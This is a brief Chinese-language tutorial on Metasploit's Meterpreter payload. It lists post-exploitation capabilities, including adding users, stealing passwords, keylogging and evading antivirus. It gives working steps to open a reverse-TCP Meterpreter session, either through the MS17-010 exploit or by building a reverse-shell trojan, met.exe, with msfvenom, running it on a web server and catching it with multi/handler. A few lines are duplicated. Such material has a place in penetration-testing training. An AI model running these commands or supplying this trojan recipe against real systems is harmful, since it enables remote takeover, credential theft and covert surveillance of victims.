一,简介:
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。
Meterpreter shell作为渗透模块有很多有用的功能:
比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
如果操作系统存在漏洞,可以直接利用漏洞反弹meterpreter会话:
如: 利用ms17-010漏洞反弹
设置 payload
set payload windows/x64/meterpreter/reverse_tcp
设置被攻击设备IP:
set RHOSTS IP
设置本地接收会话IP:
set LHOST IP
如果操作系统存在漏洞,可以直接利用漏洞反弹meterpreter会话:
如: 利用ms17-010漏洞反弹
发起攻击获得meterprenter会话:
如果操作系统不存在漏洞,可以上传反弹会话的木马
1. 利用kali生成反弹shell的执行程序:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(kali--ip) LPORT=(kali接口shell的端口) -f exe -o met.exe
2. 在kali上利用metasploit中的exploit/multi/handler进行攻击:
接收反弹的会话 注意IP地址和端口要跟生成的木马地址端口相同
3. 上传met.exe程序到web服务器,并且执行该程序, 会话上线
|